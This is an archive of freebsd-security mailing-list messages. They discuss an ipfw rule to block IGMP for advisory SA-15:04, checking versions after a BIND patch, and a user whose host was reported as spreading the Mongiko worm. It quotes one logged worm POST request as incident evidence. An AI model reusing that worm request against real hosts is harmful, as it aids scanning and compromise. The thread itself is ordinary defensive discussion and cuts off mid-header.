boundary="Apple-Mail=_8B5A2B00-5407-491B-9760-2C319F006544"; protocol="application/pgp-signature"; micalg=pgp-sha1 X-Pgp-Agent: GPGMail 2.5b5 From: Remko Lodder In-Reply-To: Date: Wed, 25 Feb 2015 18:21:58 +0100 Message-Id: <1BE461E0-D2AC-4222-8D41-B7F97E83FD74@FreeBSD.org> References: To: Karl Pielorz X-Mailer: Apple Mail (2.2070.6) Cc: freebsd-security@freebsd.org X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.18-1 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 25 Feb 2015 17:22:14 -0000 --Apple-Mail=_8B5A2B00-5407-491B-9760-2C319F006544 Content-Transfer-Encoding: quoted-printable Content-Type: text/plain; charset=us-ascii > On 25 Feb 2015, at 12:24, Karl Pielorz wrote: >=20 >=20 > Hi, >=20 > Presumably if you don't need IGMP, ipfw can be used to mitigate this = on hosts until they're patched / rebooted, i.e. >=20 > ipfw add x deny igmp from any to any >=20 > ? This suggests that you can filter the traffic: Block incoming IGMP packets by protecting your host/networks with a = firewall. (Quote from the SA). Br, Remko >=20 > Thanks, >=20 > -Karl >=20 > ---------- Forwarded Message ---------- > Date: 25 February 2015 06:29 +0000 > From: FreeBSD Security Advisories > To: FreeBSD Security Advisories > Subject: FreeBSD Security Advisory FreeBSD-SA-15:04.igmp >=20 > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA512 >=20 > = =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= > =3D=3D FreeBSD-SA-15:04.igmp = Security > Advisory The > FreeBSD Project >=20 > Topic: Integer overflow in IGMP protocol >=20 > _______________________________________________ > freebsd-security@freebsd.org mailing list > http://lists.freebsd.org/mailman/listinfo/freebsd-security > To unsubscribe, send any mail to = "freebsd-security-unsubscribe@freebsd.org" -- /"\ Best regards, | remko@FreeBSD.org \ / Remko Lodder | remko@EFnet X http://www.evilcoder.org/ | / \ ASCII Ribbon Campaign | Against HTML Mail and News --Apple-Mail=_8B5A2B00-5407-491B-9760-2C319F006544 Content-Transfer-Encoding: 7bit Content-Disposition: attachment; filename=signature.asc Content-Type: application/pgp-signature; name=signature.asc Content-Description: Message signed with OpenPGP using GPGMail -----BEGIN PGP SIGNATURE----- Comment: GPGTools - http://gpgtools.org iQIcBAEBAgAGBQJU7gS3AAoJEKjD27JZ84ywuWYQAKrK/VCC5CfTrftCoJXFF8vl MuB8/1dP8rooI3q0mHZ218gyggUhBC8vGEjKSa9exug6ME7PIxWAqNsGnTVYFkNo 8dzrRvXoy/sEaMNcCO6+9Mn3UP8OAYY9kJBe9UaWruXjsbqAnkETkVNaBJ18mZse GMZPKN93+E11cNBYWiAsZihCkjDTY4ixQjopt6AlcpRWVb9lkLwBsiH4XQOhe7C7 lIBuNGtq9jA0kpBU0FduxglquJCaBTY2wU1fKnOeqgVtT7sLaJ1NmELACJJzBWU8 Lh0ud8MQ8yiqLB6fLVfVLVIzX/jWTiVPvzgLs0p0UiP6I7YBPPHeOXSaQ87Kzkwj 146cT+YphCLuEnLS9MZp2xJ2pEvgw2390vyMecB0xcJhVlNhB+NB5rJxW+BJyx0Y UsqCeu7YFkOtZDiGzcuie+SnPdDmM28S8BSOy1UHhPz3tArdQfvqF25HMno6tW0L o6H+kLcdUeXCdMYZd7Kij2aQJRWnNt/ytsRfuzXa3nDBlMUmNSkZpJZ2DtcBJqUl zVI8iau9F+Ibhs/hxbSjtQ4f+IhOXyn5ZXCgx02xFFw/XBiDbLOSqeY2xkoTlL0m N5630f1d4gZ3gZtWiMfDYvnjX7SbCFO7az0LxvFOxxBqmkWf9KW2xrOwyRbrZSJ/ Li7GIzf8EsXd7ECCJ9Tm =9xR7 -----END PGP SIGNATURE----- --Apple-Mail=_8B5A2B00-5407-491B-9760-2C319F006544-- From owner-freebsd-security@FreeBSD.ORG Wed Feb 25 18:02:43 2015 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [8.8.178.115]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by hub.freebsd.org (Postfix) with ESMTPS id A24D4F3E for ; Wed, 25 Feb 2015 18:02:43 +0000 (UTC) Received: from as1.azsupport.com (azsupport.com [74.52.186.194]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (Client CN "azsupport.com", Issuer "COMODO RSA Domain Validation Secure Server CA" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id 862A0DD7 for ; Wed, 25 Feb 2015 18:02:43 +0000 (UTC) Date: Wed, 25 Feb 2015 18:56:01 +0100 From: Andrei To: freebsd-security@freebsd.org Subject: Re: FreeBSD Security Advisory FreeBSD-SA-15:04.igmp (fwd) - ipfw fix? Message-ID: <20150225185601.004af9ec@azsupport.com> In-Reply-To: <1BE461E0-D2AC-4222-8D41-B7F97E83FD74@FreeBSD.org> References: <1BE461E0-D2AC-4222-8D41-B7F97E83FD74@FreeBSD.org> Organization: azsupport.com X-Mailer: Claws Mail 3.11.1 (GTK+ 2.24.25; amd64-portbld-freebsd11.0) MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.18-1 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 25 Feb 2015 18:02:43 -0000 On Wed, 25 Feb 2015 18:21:58 +0100 Remko Lodder wrote: > > This suggests that you can filter the traffic: > > Block incoming IGMP packets by protecting your host/networks with a > firewall. (Quote from the SA). > > Br, > Remko > Looks like Captain Obvious here. The question was how exactly to do it? Kind regards, Andrei. From owner-freebsd-security@FreeBSD.ORG Wed Feb 25 18:11:57 2015 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by hub.freebsd.org (Postfix) with ESMTPS id BDCDA190; Wed, 25 Feb 2015 18:11:57 +0000 (UTC) Received: from mail-ob0-x236.google.com (mail-ob0-x236.google.com [IPv6:2607:f8b0:4003:c01::236]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id 8389EEF1; Wed, 25 Feb 2015 18:11:57 +0000 (UTC) Received: by mail-ob0-f182.google.com with SMTP id nt9so5475374obb.13; Wed, 25 Feb 2015 10:11:56 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :cc:content-type; bh=3Vhd1rIKVctDqTTMzy9nNXA5LuV3Y1/l91PQ0A/oLFc=; b=bbspkIZtwQJAmD8rV7f0pt1Kwz5EEemQJi6mJUay3on4Tum9ErKmRBLaiSYfJEUXwY 785RBNbch/c0//DP3mcRFt+sJVd8eyj9C6xcMZn/9vkkBblEJMaRI9T1+fztrEfE0FzY kMTH9qoq0507bKcGfzZVoUc3dF0iCZDAku8e4v1T8+aGcdMf076TP55sM5jH4jDVH3Ci GOqqNOVywrjNxgGIRFWPjSm3nlKlflY7O9e2KoqRGbMGvI7YcfJ7mtwzgOEkfXdqSF8T OUO5XSJb4B3fAKEkS1VIVrhao0WrOwc1yiH7H62Amz282JXixTbtpYgWNuioZOwpKzcC iOBQ== MIME-Version: 1.0 X-Received: by 10.60.63.39 with SMTP id d7mr3186569oes.4.1424887916598; Wed, 25 Feb 2015 10:11:56 -0800 (PST) Received: by 10.182.247.74 with HTTP; Wed, 25 Feb 2015 10:11:56 -0800 (PST) In-Reply-To: <201502250629.t1P6TSid007902@freefall.freebsd.org> References: <201502250629.t1P6TSid007902@freefall.freebsd.org> Date: Wed, 25 Feb 2015 10:11:56 -0800 Message-ID: Subject: Re: FreeBSD Security Advisory FreeBSD-SA-15:05.bind From: jungle Boogie To: freebsd-security@freebsd.org Content-Type: text/plain; charset=UTF-8 Cc: FreeBSD Security Advisories X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.18-1 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 25 Feb 2015 18:11:57 -0000 Hi Security Officials of FreeBSD, On 24 February 2015 at 22:29, FreeBSD Security Advisories wrote: > 2) To update your vulnerable system via a binary patch: > > Systems running a RELEASE version of FreeBSD on the i386 or amd64 > platforms can be updated via the freebsd-update(8) utility: > > # freebsd-update fetch > # freebsd-update install My recommendation as a self check: Recommend users run freebsd-version -k and freebsd-version -u and indicate in the SA what they should see as a result. I know you don't want to give a false sense of security but when the result of following the prescribed advice is: freebsd-update install Installing updates...install: ///usr/src/crypto/openssl/util/mkbuildinf.pl: No such file or directory It may be ideal to let users know how to check their systems. -- ------- inum: 883510009027723 sip: jungleboogie@sip2sip.info xmpp: jungle-boogie@jit.si From owner-freebsd-security@FreeBSD.ORG Wed Feb 25 19:50:10 2015 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [8.8.178.115]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by hub.freebsd.org (Postfix) with ESMTPS id 8FF12EDC for ; Wed, 25 Feb 2015 19:50:10 +0000 (UTC) Received: from plane.gmane.org (plane.gmane.org [80.91.229.3]) (using TLSv1 with cipher AES256-SHA (256/256 bits)) (Client did not present a certificate) by mx1.freebsd.org (Postfix) with ESMTPS id 4B180CBE for ; Wed, 25 Feb 2015 19:50:10 +0000 (UTC) Received: from list by plane.gmane.org with local (Exim 4.69) (envelope-from ) id 1YQhy8-0005fl-4R for freebsd-security@freebsd.org; Wed, 25 Feb 2015 20:50:04 +0100 Received: from dynamic34-29.dynamic.dal.ca ([129.173.34.203]) by main.gmane.org with esmtp (Gmexim 0.1 (Debian)) id 1AlnuQ-0007hv-00 for ; Wed, 25 Feb 2015 20:50:04 +0100 Received: from jrm by dynamic34-29.dynamic.dal.ca with local (Gmexim 0.1 (Debian)) id 1AlnuQ-0007hv-00 for ; Wed, 25 Feb 2015 20:50:04 +0100 X-Injected-Via-Gmane: http://gmane.org/ To: freebsd-security@freebsd.org From: Joseph Mingrone Subject: has my 10.1-RELEASE system been compromised Date: Wed, 25 Feb 2015 15:41:05 -0400 Lines: 53 Message-ID: <864mq9zsmm.fsf@gly.ftfl.ca> Mime-Version: 1.0 Content-Type: text/plain X-Complaints-To: usenet@ger.gmane.org X-Gmane-NNTP-Posting-Host: dynamic34-29.dynamic.dal.ca User-Agent: Gnus/5.13 (Gnus v5.13) Emacs/24.4 (berkeley-unix) Cancel-Lock: sha1:sKJAeAID8q4ZZSfwFnvR+y8LMc0= X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.18-1 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 25 Feb 2015 19:50:10 -0000 This morning when I arrived at work I had this email from my university's IT department (via email.it) informing me that my host was infected and spreading a worm. "Based on the logs fingerprints seems that your server is infected by the following worm: Net-Worm.PHP.Mongiko.a" my ip here - - [23/Feb/2015:14:53:37 +0100] "POST /?cmd=info&key=f8184c819717b6815a8b8037e91c59ef&ip=212.97.34.7 HTTP/1.1" 200 429 "-" "Net- Worm.PHP.Mongiko.a" Despite the surprising name, I don't see any evidence that it's related to php. I did remove php, because I don't really need it. I've included my /etc/rc.conf below. pkg audit doesn't show any vulnerabilities. Searching for Worm.PHP.Mongiko doesn't show much. I've run chkrootkit, netstat/sockstat and I don't see anything suspicious and I plan to finally put some reasonable firewall rules on this host. Do you have any suggestions? Should I include any other information here? Joseph #bsdstats_enable="YES" clear_tmp_enable="YES" devfs_system_ruleset="localrules" dumpdev="AUTO" hostname="gly.ftfl.ca" ifconfig_re0="SYNCDHCP" linux_enable="YES" local_unbound_enable="YES" keymap="us.jrm" lpd_enable="YES" moused_enable="YES" moused_port="/dev/ums0" moused_ums0_flags="-A 2.5,2.0 -a 1 -V" nginx_enable="YES" ntpd_enable="YES" panicmail_enable="YES" php_fpm_enable="YES" spawn_fcgi_enable="YES" spawn_fcgi_bindaddr="" spawn_fcgi_bindport="" spawn_fcgi_bindsocket="/var/run/spawn_fcgi.socket" spawn_fcgi_bindsocket_mode="0700" sshd_enable="YES" update_motd="NO" usbd_enable="YES" zfs_enable="YES" znc_enable="YES" znc_user="znc" From owner-freebsd-security@FreeBSD.ORG Wed Feb 25 20:01:31 2015 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx2.freebsd.org (mx2.freebsd.org [8.8.178.116]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by hub.freebsd.org (Postfix) with ESMTPS id 47309359 for ; Wed, 25 Feb 2015 20:01:31 +0000 (UTC) Received: from hammer.pct.niksun.com (freefall.freebsd.org [IPv6:2001:1900:2254:206c::16:87]) by mx2.freebsd.org (Postfix) with ESMTP id CEE15860; Wed, 25 Feb 2015 20:01:30 +0000 (UTC) Message-ID: <54EE2A19.7050108@FreeBSD.org> Date: Wed, 25 Feb 2015 15:01:29 -0500 From: Jung-uk Kim User-Agent: Mozilla/5.0 (X11; FreeBSD amd64; rv:31.0) Gecko/20100101 Thunderbird/31.4.0 MIME-Version: 1.0 To: Joseph Mingrone , freebsd-security@freebsd.org Subject: Re: has my 10.1-RELEASE system been compromised References: <864mq9zsmm.fsf@gly.ftfl.ca> In-Reply-To: <864mq9zsmm.fsf@gly.ftfl.ca> Content-Type: text/plain; charset=windows-1252 Content-Transfer-Encoding: 7bit X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.18-1 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 25 Feb 2015 20:01:31 -0000 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 On 02/25/2015 14:41, Joseph Mingrone wrote: > This morning when I arrived at work I had this email from my > university's IT department (via email.it) informing me that my host > was infected and spreading a worm. > > "Based on the logs fingerprints seems that your server is infected > by the following worm: Net-Worm.PHP.Mongiko.a" > > my ip here - - [23/Feb/2015:14:53:37 +0100] "POST > /?cmd=info&key=f8184c819717b6815a8b8037e91c59ef&ip=212.97.34.7 > HTTP/1.1" 200 429 "-" "Net- Worm.PHP.Mongiko.a" > > Despite the surprising name, I don't see any evidence that it's > related to php. I did remove php, because I don't really need it. > I've included my /etc/rc.conf below. pkg audit doesn't show any > vulnerabilities. Searching for Worm.PHP.Mongiko doesn't show > much. I've run chkrootkit, netstat/sockstat and I don't see > anything suspicious and I plan to finally put some reasonable > firewall rules on this host. > > Do you have any suggestions? Should I include any other > information here? ... I found this: http://security.stackexchange.com/questions/82273/what-is-net-worm-php-mongiko-trying-to-do Jung-uk Kim -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQEcBAEBCAAGBQJU7ioVAAoJEHyflib82/FGXjoH/if/ZIuW6/KvVD0fYJ7Mfmkj wkB7BzfYcE2KQ4PomwWzEUoyc1b2RNZ9a0b/FaxMK3xUGwbKqchiCT+KlHUAdWRc ifK9dOMg/DRtmacmo718k4SZghPlHY1AtB0I65vo7YSWCMxQJkgY9cxdKIvdoLkd ujV2+yFjmg2zKM7bDkoCt2c34iUODUeXm2FUPIjVYCycwusDhXY2WZ+AZTmgDdQA O8AlLRgSTjN53VdiK8HTW3Q5JTDtCymHNT8Oj8MZoEYwkOuh1jQnAaGrWaS1wQo4 MtiqShnKLZoyKPZYll84r0aCTqt997ZhhVYqsO13Db8Ev66pC56niQy31FfCfbw= =0dgN -----END PGP SIGNATURE----- From owner-freebsd-security@FreeBSD.ORG Wed Feb 25 20:05:03 2015 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by hub.freebsd.org (Postfix) with ESMTPS id 4B5B75E3 for ; Wed, 25 Feb 2015 20:05:03 +0000 (UTC) Received: from mail-qg0-x231.google.com (mail-qg0-x231.google.com [IPv6:2607:f8b0:400d:c04::231]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id EC98BEED for ; Wed, 25 Feb 2015 20:05:02 +0000 (UTC) Received: by mail-qg0-f49.google.com with SMTP id q107so4994464qgd.8 for ; Wed, 25 Feb 2015 12:05:02 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=ftfl.ca; s=google; h=from:to:cc:subject:references:date:in-reply-to:message-id :user-agent:mime-version:content-type; bh=lBYgmmRu1nhuZh++S2pV+CQcdJI5q2wvKOc4m6LwMLE=; b=ajKTuJy8WVOLVNGAUA//qNZie/QRnr4bBCo4a9mI7vSz+t49BNRLA/0NprVlqwdFTG IBJPibHxSCrWTOSh1NjTS+0h1VOCiiX/kmew7THvvf5pggFawWiZuGLlcVWOuFL3Pv8d sH0hzlRXrapf+tn8XsY0QXP6wAtoIDXfJ2EqI= X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20130820; h=x-gm-message-state:from:to:cc:subject:references:date:in-reply-to :message-id:user-agent:mime-version:content-type; bh=lBYgmmRu1nhuZh++S2pV+CQcdJI5q2wvKOc4m6LwMLE=; b=fLq9gbYsTPaQjrUw1qYIm8WNZalwUEnGBKtajtSy9Q2sjtTW2SqAFNiCQdap8h9s+K vViTEKec0J8p1fpo4TgiQerQRem81qySeKDo/GOYTpLR9W6wPInnTJb0hvGS1jL/ysZU QyBHBJP8GuxHg1FMhP4LKlyg1NwW0mcdXv2bBMrVG71skvlGuDD+3eRhlNuGJcAOARXX TSIFjZr9z30HLxaj7HM1eCwOJLat/cl0xwXIp3fEP1ntEyvXtOFQ82iw7e9F+GJBOG6h gdUBbOYEZJj2kjVbbTeO5zmR5TH54QfjT/cTUWE5HCXIUN9czMPrLw4K+/RT5UR3MyIQ aklg== X-Gm-Message-State: ALoCoQlNy+U9EiYWoPwMI8fW6l1k/ph21d5ja5tvBft+NbXM2lAndK+bnzg5homvOWjTIRLHAaoO X-Received: by 10.140.201.84 with SMTP id w81mr10843045qha.19.1424894702015; Wed, 25 Feb 2015 12:05:02 -0800 (PST) Received: from gly.ftfl.ca.ftfl.ca (Dynamic34-29.Dynamic.Dal.Ca. [129.173.34.203]) by mx.google.com with ESMTPSA id f9sm32127115qgf.17.2015.02.25.12.05.00 (version=TLSv1.2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128); Wed, 25 Feb 2015 12:05:00 -0800 (PST) From: Joseph Mingrone To: Jung-uk Kim Subject: Re: has my 10.1-RELEASE system been compromised References: <864mq9zsmm.fsf@gly.ftfl.ca> <54EE2A19.7050108@FreeBSD.org> Date: Wed, 25 Feb 2015 16:04:59 -0400 In-Reply-To: <54EE2A19.7050108@FreeBSD.org> (Jung-uk Kim's message of "Wed, 25 Feb 2015 15:01:29 -0500") Message-ID: <86vbipycyc.fsf@gly.ftfl.ca> User-Agent: Gnus/5.13 (Gnus v5.13) Emacs/24.4 (berkeley-unix) MIME-Version: 1.0 Content-Type: text/plain Cc: freebsd-security@freebsd.org X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.18-1 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 25 Feb 2015 20:05:03 -0000 Jung-uk Kim writes: > On 02/25/2015 14:41, Joseph Mingrone wrote: >> This morning when I arrived at work I had this email from my >> university's IT department (via email.it) informing me that my host >> was infected and spreading a worm. >> >> "Based on the logs fingerprints seems that your server is infected >> by the following worm: Net-Worm.PHP.Mongiko.a" >> >> my ip here - - [23/Feb/2015:14:53:37 +0100] "POST >> /?cmd=info&key=f8184c819717b6815a8b8037e91c59ef&ip=212.97.34.7 >> HTTP/1.1" 200 429 "-" "Net- Worm.PHP.Mongiko.a" >> >> Despite the surprising name, I don't see any evidence that it's >> related to php. I did remove php, because I don't really need it. >> I've included my /etc/rc.conf below. pkg audit doesn't show any >> vulnerabilities. Searching for Worm.PHP.Mongiko doesn't show >> much. I've run chkrootkit, netstat/sockstat and I don't see >> anything suspicious and I plan to finally put some reasonable >> firewall rules on this host. >> >> Do you have any suggestions? Should I include any other >> information here? > ... > > I found this: > > http://security.stackexchange.com/questions/82273/what-is-net-worm-php-mongiko-trying-to-do > > Jung-uk Kim Yeah, I saw that as well. I wouldn't be concerned if this was hitting my web server, but the key difference here is that my IP is the apparently the source in this case. Joseph From owner-freebsd-security@FreeBSD.ORG Wed Feb 25 20:24:06 2015 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by hub.freebsd.org (Postfix) with ESMTPS id B84C0C10; Wed, 25 Feb 2015 20:24:06 +0000 (UTC) Received: from mail-qa0-x22c.google.com (mail-qa0-x22c.google.com [IPv6:2607:f8b0:400d:c00::22c]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id 6E9CB1E8; Wed, 25 Feb 2015 20:24:06 +0000 (UTC) Received: by mail-qa0-f44.google.com with SMTP id n8so4604393qaq.3; Wed, 25 Feb 2015 12:24:05 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :cc:content-type; bh=/gzVWjG8jFJQCWT2NuOQvrFuit4MeL4clniwNcPodiw=; b=eX6no+8nyghphuz7wFC0nsWME1W2xHWWpRHG5V2OsubqBoGEcQqg71H/mAi57y6Qwv 05yS6guEf1eY7E2qvak1NgJpSslyqc7CPE0s37mEjHSs8090RRcwc60UJNRTfgcAoIU2 w2NtvBaC4oYXDZzq0wEIKDBEohuCADU2okZnbJeuqx47ompByjKbTSCjFCGmcBJA1lQf 1FdUuC+3eQRRUMQ+QwvMawtTqu+lsAD9eZSJJ6mNOPWksuwYXYHGDdTbkpitloVh1PtH cIdW0FGWLSLYyl/8850drzhC2lTYO8Zsk2IfiDTXoJGYHoMs0RLslZ+lvtIGTMMCRcT9 08/g== MIME-Version: 1.0 X-Received: by 10.140.88.80 with SMTP id s74mr10348720qgd.28.1424895845550; Wed, 25 Feb 2015 12:24:05 -0800 (PST) Received: by 10.140.107.165 with HTTP; Wed, 25 Feb 2015 12:24:04 -0800 (PST) Received: by 10.140.107.165 with HTTP; Wed, 25 Feb 2015 12:24:04 -0800 (PST) In-Reply-To: <86vbipycyc.fsf@gly.ftfl.ca> References: <864mq9zsmm.fsf@gly.ftfl.ca> <54EE2A19.7050108@FreeBSD.org> <86vbipycyc.fsf@gly.ftfl.ca> Date: Wed, 25 Feb 2015 14:24:04 -0600 Message-ID: Subject: Re: has my 10.1-RELEASE system been compromised From: Matt Donovan To: Joseph Mingrone Content-Type: text/plain; charset=ISO-8859-1 X-Content-Filtered-By: Mailman/MimeDel 2.1.18-1 Cc: freebsd-security , Jung-uk Kim X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.18-1 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 25 Feb 2015 20:24:06 -0000 On Feb 25, 2015 2:05 PM, "Joseph Mingrone" wrote: > > Jung-uk Kim writes: > > > On 02/25/2015 14:41, Joseph Mingrone wrote: > >> This morning when I arrived at work I had this email from my > >> university's IT department (via email.it) informing me that my host > >> was infected and spreading a worm. > >> > >> "Based on the logs fingerprints seems that your server is infected > >> by the following worm: Net-Worm.PHP.Mongiko.a" > >> > >> my ip here - - [23/Feb/2015:14:53:37 +0100] "POST > >> /?cmd=info&key=f8184c819717b6815a8b8037e91c59ef&ip=212.97.34.7 > >> HTTP/1.1" 200 429 "-" "Net- Worm.PHP.Mongiko.a" > >> > >> Despite the surprising name, I don't see any evidence that it's > >> related to php. I did remove php, because I don't really need it. > >> I've included my /etc/rc.conf below. pkg audit doesn't show any > >> vulnerabilities. Searching for Worm.PHP.Mongiko doesn't show > >> much. I've run chkrootkit, netstat/sockstat and I don't see > >> anything suspicious and I plan to finally put some reasonable > >> firewall rules on this host. > >> > >> Do you have any suggestions? Should I include any other > >> information here? > > ... > > > > I found this: > > > > http://security.stackexchange.com/questions/82273/what-is-net-worm-php-mongiko-trying-to-do > > > > Jung-uk Kim > > Yeah, I saw that as well. I wouldn't be concerned if this was hitting > my web server, but the key difference here is that my IP is the > apparently the source in this case. > > Joseph > _______________________________________________ Hello, First run sockstat to see any connections that you do not recognize. This will help narrow the scope. Usually this is installed though a compromised web application as well such as a password compromise or a vulnerability. As several malware when doing ps looks like a different program running. From owner-freebsd-security@FreeBSD.ORG Wed Feb 25 20:25:36 2015 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [8.8.178.115]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by hub.freebsd.org (Postfix) with ESMTPS id B7914D20 for ; Wed, 25 Feb 2015 20:25:36 +0000 (UTC) Received: from mail-qc0-x22b.google.com (mail-qc0-x22b.google.com [IPv6:2607:f8b0:400d:c01::22b]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id 62996219 for ; Wed, 25 Feb 2015 20:25:36 +0000 (UTC) Received: by qcvs11 with SMTP id s11so5023027qcv.11 for ; Wed, 25 Feb 2015 12:25:35 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=ftfl.ca; s=google; h=from:to:cc:subject:references:date:in-reply-to:message-id :user-agent:mime-version:content-type; bh=qZ2ltPozzu+3ZNeIqCPUfE57PWhZPEI1se3gBXe8MUY=; b=CzPpfzqlVce8B4PDtIyS9pJjE2Q3kcXKYxHJvX9ZEGZlworv5gcJUZ+wLbnz0NUHN2 wteI3G5GcnNM2ZpFOefHZgf0mOgE8p1xpx5JS9+ZZEytwgh1yWt+exHYU00F9bxNyoVR xS6MbyIDDJY1w9QVW3m0nmPgke5kaeGhOst+o= X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20130820; h=x-gm-message-state:from:to:cc:subject:references:date:in-reply-to :message-id:user-agent:mime-version:content-type; bh=qZ2ltPozzu+3ZNeIqCPUfE57PWhZPEI1se3gBXe8MUY=; b=U2HupAg19FwKxJNvhgLyKeGWQVm9dkZlCsCbLEUduVnheWBzQ7Fq97FTjy535Lm9Yp eLbfaFHVNPEuPm4ol+tcpKE+6SO0rh5oNFga2qFItcyUU67vHDdP8p0v2UI3RDrq2zND qPMcOPSanlAQmaJeu81Lq/bZlCAcd8NzwRC4eQPRGI4f2iJuLsI6ywq11SvPZoUetVTh qwRtgq/ayy0AR+bjYIbwmj5ATI2oBHHUNrDawAImO7/5qrlwM+bA6FTUcqUviwoU6U1o Uow3p1rWPTtVZTOiRgx7BV6w38MvNWOCqeTA/Z6BbWlmH93etnFKRa/mK1w6R9MNt81k 6ACQ== X-Gm-Message-State: ALoCoQmWPSA/W0PGQnWFJ/1SbJMo9UUhudxJR0sJ4/RglJaYogvoh+WN/NWbaGfxTY2vwnmtj9OI X-Received: by 10.140.145.3 with SMTP id 3mr10745389qhr.43.1424895935324; Wed, 25 Feb 2015 12:25:35 -0800 (PST) Received: from gly.ftfl.ca.ftfl.ca (Dynamic34-29.Dynamic.Dal.Ca. [129.173.34.203]) by mx.google.com with ESMTPSA id x124sm22152081qha.2.2015.02.25.12.25.33 (version=TLSv1.2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128); Wed, 25 Feb 2015 12:25:34 -0800 (PST) From: Joseph Mingrone To: Philip Jocks Subject: Re: has my 10.1-RELEASE system been compromised References: <864mq9zsmm.fsf@gly.ftfl.ca> <54EE2A19.7050108@FreeBSD.org> <86vbipycyc.fsf@gly.ftfl.ca> <1B20A559-59C5-477A-A2F3-9FD7E16C09E8@netzkommune.com> Date: Wed, 25 Feb 2015 16:25:32 -0400 In-Reply-To: <1B20A559-59C5-477A-A2F3-9FD7E16C09E8@netzkommune.com> (Philip Jocks's message of "Wed, 25 Feb 2015 21:16:48 +0100") 